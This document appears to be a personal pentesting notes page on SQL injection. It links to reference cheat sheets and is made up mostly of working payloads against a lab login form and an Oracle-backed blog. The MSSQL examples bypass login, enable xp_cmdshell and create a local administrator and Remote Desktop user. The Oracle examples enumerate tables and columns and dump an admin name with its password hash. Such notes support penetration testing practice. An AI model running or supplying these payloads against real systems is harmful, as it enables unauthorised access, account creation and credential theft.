# SQL Injection

### MSSQL

{% embed url="<https://www.exploit-db.com/papers/12975>" %}

{% embed url="<http://www.securityidiots.com/Web-Pentest/SQL-Injection/Union-based-Oracle-Injection.html>" %}

{% embed url="<https://portswigger.net/web-security/sql-injection/blind>" %}

{% embed url="<https://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet>" %}

```
MSSQL INJECTION EXAMPLE
## LOGIN-FORM
http://10.10.10.111:4167/loginform.asp?uname=Gerh&psw=test' or '1'='1
http://10.10.10.111:4167/loginform.asp?uname=Gerh&psw=test'; IF (1=1) WAITFOR DELAY '0:0:10'--
http://10.10.10.111:4167/loginform.asp?uname=Gerh&psw=test'; WAITFOR DELAY '0:0:10'--

http://10.10.10.111:4167/loginform.asp?uname=Gerh&psw=test'; EXEC sp_configure 'show advanced options', 1;--
http://10.10.10.111:4167/loginform.asp?uname=Gerh&psw=test'; RECONFIGURE;--
http://10.10.10.111:4167/loginform.asp?uname=Gerh&psw=test'; EXEC sp_configure 'xp_cmdshell', 1;--
http://10.10.10.111:4167/loginform.asp?uname=Gerh&psw=test'; RECONFIGURE;--

http://10.10.10.111:4167/loginform.asp?uname=Gerh&psw=test'; EXEC xp_cmdshell 'net user gerh Pass123 /add';--
http://10.10.10.111:4167/loginform.asp?uname=Gerh&psw=test'; EXEC xp_cmdshell 'net localgroup Administrators gerh /add';--
http://10.10.10.111:4167/loginform.asp?uname=Gerh&psw=test'; EXEC xp_cmdshell 'net localgroup "Remote Desktop Users" gerh /add';--


http://10.10.10.111:4167/loginform.asp?uname=Gerh&psw=test'; EXEC sp_addlogin 'user', 'pass';-- 
```

```
SQL ORACLE EXAMPLE
' or '1'='1
' order by 3--
' order by 4-- == RETORNA ERROR
' UNION SELECT 1, 1, 1--
' UNION SELECT 1, 1, 1 from dual--
' UNION SELECT null, null, null from dual--

' UNION SELECT 'XXX', 'ZZZ', null from dual--

' UNION SELECT 'XXX', sys.database_name, null from dual--
Blog entry from XXX with title XE from 0

' UNION SELECT 'XXX', (select banner from v$version where rownum=1), null from dual--
Blog entry from XXX with title Oracle Database 18c Express Edition Release 18.0.0.0.0 - Production from 0

' UNION SELECT 'XXX', table_name, null from all_tables--
Blog entry from XXX with title ALL_UNIFIED_AUDIT_ACTIONS from 0
Blog entry from XXX with title AUDIT_ACTIONS from 0
Blog entry from XXX with title AV_DUAL from 0
Blog entry from XXX with title AW$AWCREATE from 0

' UNION SELECT 'XXX', column_name, null from all_tab_columns where table_name='WEB_USERS'--
Blog entry from XXX with title PASSWORD from 0
Blog entry from XXX with title USER_ID from 0
Blog entry from XXX with title USER_NAME from 0

' UNION SELECT 'XXX', column_name, null from all_tab_columns where table_name='WEB_ADMINS'--
Blog entry from XXX with title ADMIN_ID from 0
Blog entry from XXX with title ADMIN_NAME from 0
Blog entry from XXX with title PASSWORD from 0


' UNION SELECT 'XXX', ADMIN_NAME||PASSWORD, null from WEB_ADMINS--
Blog entry from XXX with title admind82494f05d6917ba02f7aaa29689ccb444bb73f20380876cb05d1f37537b7892 from 0
```

{% embed url="<https://portswigger.net/support/using-sql-injection-to-bypass-authentication>" %}